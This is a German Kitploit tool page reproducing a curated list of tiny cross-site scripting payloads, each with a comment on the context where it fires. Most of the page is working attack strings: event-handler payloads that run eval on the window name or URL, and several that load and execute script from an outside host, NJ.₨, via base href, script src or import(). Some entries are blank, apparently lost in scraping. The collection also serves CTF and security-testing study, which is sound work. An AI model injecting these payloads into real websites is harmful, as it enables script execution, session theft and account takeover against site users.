Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tiny-XSS-Payloads — Eine Sammlung winziger XSS-Payloads, die in verschiedenen Kontexten verwendet werden können. https://tinyxss.terjanq.me | Kitploit
Tools/GitHubGitHub/terjanq/tiny-xss-payloads
Payload-GenerierungWebsicherheitCTFKuratierte Ressourcen
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

Eine Sammlung winziger XSS-Payloads, die in verschiedenen Kontexten verwendet werden können. https://tinyxss.terjanq.me

Repository anzeigen
2.4k218vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Tiny-XSS-Payloads

Eine Sammlung kurzer XSS-Payloads, die in verschiedenen Kontexten verwendet werden können.

Die Demo ist hier verfügbar: https://tinyxss.terjanq.me

Aktuelle Payloads

root@kitploit:~
<!-- Erfordert ein relatives Skript, das nach der Senke in das DOM eingefügt wird, z. B. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Funktioniert nur als reflected XSS -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- Wenn du die URL kontrollierst -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Wenn du den Namen kontrollierst, aber unsafe-eval nicht aktiviert ist -->
<svg/onload=location=name>
root@kitploit:~
<!-- In Chrome funktioniert es auch innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- Wenn du den Namen des Fensters kontrollierst, funktioniert dieser Payload innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- Wenn du die URL kontrollierst, funktioniert dieser Payload innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->

root@kitploit:~
<!-- Nur ein einfaches Skript -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- Wenn du den Namen des Fensters kontrollierst -->

root@kitploit:~
<!-- Wenn du die URL kontrollierst -->

root@kitploit:~
<!-- Wenn die Anzahl der iframes auf der Seite konstant ist -->

root@kitploit:~
<!-- nur für Firefox -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- Wenn die Anzahl der iframes auf der Seite zufällig ist -->

root@kitploit:~
<!-- Wenn unsafe-inline in CSP deaktiviert ist und externe Skripte erlaubt sind -->
</script>">
root@kitploit:~
<!-- Wenn Inline-Styles erlaubt sind -->
<style/onload=eval(name)>
root@kitploit:~
<!-- Wenn Inline-Styles erlaubt sind und die URL kontrolliert werden kann -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Wenn Inline-Styles blockiert sind -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Verwendet externes Skript als Import, funktioniert nicht in innerHTML -->
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Verwendet externes Skript als Import, wird ausgelöst, wenn Inline-Styles erlaubt sind.
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Verwendet externes Skript als Import -->
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->

Veraltet:

root@kitploit:~
<!-- Wenn du die URL kontrollierst, nur Safari -->

root@kitploit:~
<!-- Wenn Inline-Styles erlaubt sind, nur Safari -->
<style/onload=write(URL)>
Tool herunterladen